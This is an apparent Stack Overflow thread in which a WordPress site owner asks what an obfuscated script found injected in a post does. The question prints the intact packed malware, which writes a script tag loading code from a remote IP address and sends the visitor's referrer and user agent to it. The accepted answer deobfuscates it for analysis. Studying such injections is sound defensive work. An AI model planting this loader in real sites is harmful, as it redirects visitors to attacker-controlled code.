# What does this script do? Can I somehow source it back to its creator?

Tags: javascript, obfuscation, deobfuscation

```
<script type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\\o="+3(j.i)+"\'><\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fhksd|var|u0026u|referrer|tibht||js|php'.split('|'),0,{}))
```

My apologies for the lack of formatting

I found this script inside a post on my WordPress site. It was causing malicious redirects (at least I'm assuming it was, as it was a persistent problem that went away after I deleted it, and no one at my company added the script).

Can anyone help me understand what this script is doing, and (I doubt it) if I can tell who made it/put it there.

I am taking CS in school but I don't know enough JS/Regex to understand what this is doing :(

Thanks!

Comment: I deleted your **javascript** which you stated **causes malicious activity** and referred it to a moderator. They will decide whether to reinstate the code.

Comment: Question is too broad for SO but just as FYI it is minified by a compressor called packer http://dean.edwards.name/packer/

Comment: Stack Overflow attracts a lot of developers, but it isn't necessarily the best place to ask any developer-oriented question. Specifically, Stack Overflow exists to answer questions that you have while making programs, with emphasis on questions that could help other people in the future; deobfuscating and finding malicious authors are out of scope. Additionally, posting malicious code in plain sight could expose people who would foolishly run it without protection to see what it does.

Comment: @Rob It's not executed, so what's the problem? It's stated clearly that the script is malicious, so nobody will run it. (And it's not formatted as a snippet)

Comment: Just replace the `eval` by `console.log` and see to what it evaluates.

Answer (score 1, accepted):

@Ben, that's what the code boils down to when cleaned up a bit:

Snippet is safe to execute, just string manipulations here. I've removed the `eval` part.

```js
//the passed arguments: 
//p: 
const template = '0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\\o="+3(j.i)+"\'><\\/k"+"l>");n m="q";';
//a:
const numericBase = 30;
//c:
let index = 30;
//k: 
const keywords = ["document", "", "javascript", "encodeURI", "src", "", "write", "http", "45", "67", "script", "text", "rel", "nofollow", "type", "97", "language", "jquery", "userAgent", "navigator", "sc", "ript", "fhksd", "var", "u0026u", "referrer", "tibht", "", "js", "php"];
//e is not really relevant, just an intermediate value
//d: passed empty, then filled in the following loop
const dict = {};

//first it fills the dictionary from the list of keywords
while (index--) {
  dict[index.toString(numericBase)] = keywords[index] || index.toString(numericBase);
}

console.log("dictionary: %o", dict);
console.log("template: %o", template);
//then replaces regex-words in the passed template with the entries in the dictionary
const result = template.replace(/\b\w+\b/g, function(match) {
  console.log("replace %o with %o", match, dict[match]);
  return dict[match]
})
console.log("result: %o", result);
```

```css
.as-console-wrapper {
  top: 0;
  max-height: 100%!important
}
```

then it executes that result with eval wich writes a `<script>` block that loads malicious JS and redirects you.

The code looks more complex than it is. Like the `if(!''.replace(/^/,String))` wich is basically `if(true)`. And the nonsense around

```
k=[somefunction];
c=1;
while(c--){
  if(k[c]){ doSomethingWith(k[c]) }
}
```

wich is a very complicated way to say

```
doSomethingWith(someFunction);
```